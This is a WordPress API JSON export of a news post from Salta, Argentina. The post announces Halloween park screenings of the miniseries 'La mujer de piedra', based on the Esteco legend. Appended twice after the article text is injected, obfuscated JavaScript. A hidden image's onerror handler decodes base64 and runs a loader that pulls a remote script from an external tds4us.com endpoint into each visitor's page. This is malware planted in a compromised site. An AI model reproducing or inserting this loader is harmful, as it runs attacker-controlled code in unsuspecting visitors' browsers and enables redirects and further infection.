{"id":1699,"date":"2022-10-31T12:13:53","date_gmt":"2022-10-31T15:13:53","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1699"},"modified":"2025-08-14T00:31:44","modified_gmt":"2025-08-14T03:31:44","slug":"se-proyectara-hoy-la-miniserie-la-mujer-de-piedra-en-los-parques-urbanos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1699","title":{"rendered":"Se proyectar\u00e1 hoy la miniserie La mujer de piedra en los Parques Urbanos"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#6c5105\"><em>A partir de las 18 hs la miniserie se proyectar\u00e1 en el Parque Sur; en tanto en el Bicentenario se podr\u00e1 disfrutar a las 18.30 hs. La propuesta audiovisual se basa en la Leyenda de Esteco<\/em><\/h4>\n\n\n\n<p>Este domingo 30, en el marco de Halloween, se proyectar\u00e1 en los parques Sur y del Bicentenario la miniserie La mujer de piedra de la guionista y directora Noelia Carrizo D\u2019Alesandro; la cita ser\u00e1 a las 18 hs en el Parque Sur y a las 18.30 en el Bicentenario.<\/p>\n\n\n\n<p>La miniserie se basa en la famosa Leyenda de Esteco surgida a partir de la desaparici\u00f3n de esa ciudad con motivo del terremoto de 1692; seg\u00fan la leyenda la mujer que hab\u00eda sido advertida a tiempo para huir de la debacle, lo \u00fanico que deb\u00eda cumplir era no mirar hacia atr\u00e1s pues se convertir\u00eda en piedra, lo que ocurri\u00f3.<\/p>\n\n\n\n<p>A partir de la leyenda la miniserie narra el encuentro de estudiantes con la mujer y los sucesos a partir del despertar de \u00e9sta y la aparici\u00f3n de zombis.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-proyectara-hoy-la-miniserie-la-mujer-de-piedra-en-los-parques-urbanos-85837\" target=\"_blank\" rel=\"noopener\">\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>A partir de las 18 hs la miniserie se proyectar\u00e1 en el Parque Sur; en tanto en el Bicentenario se podr\u00e1 disfrutar a las 18.30 hs. La propuesta audiovisual se basa en la Leyenda de Esteco Este domingo 30, en el marco de Halloween, se proyectar\u00e1 en los parques Sur y del Bicentenario la miniserie [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1700,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-1699","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1699"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1699"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1699\/revisions"}],"predecessor-version":[{"id":7297,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1699\/revisions\/7297"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1700"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1699"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1699"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1699"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}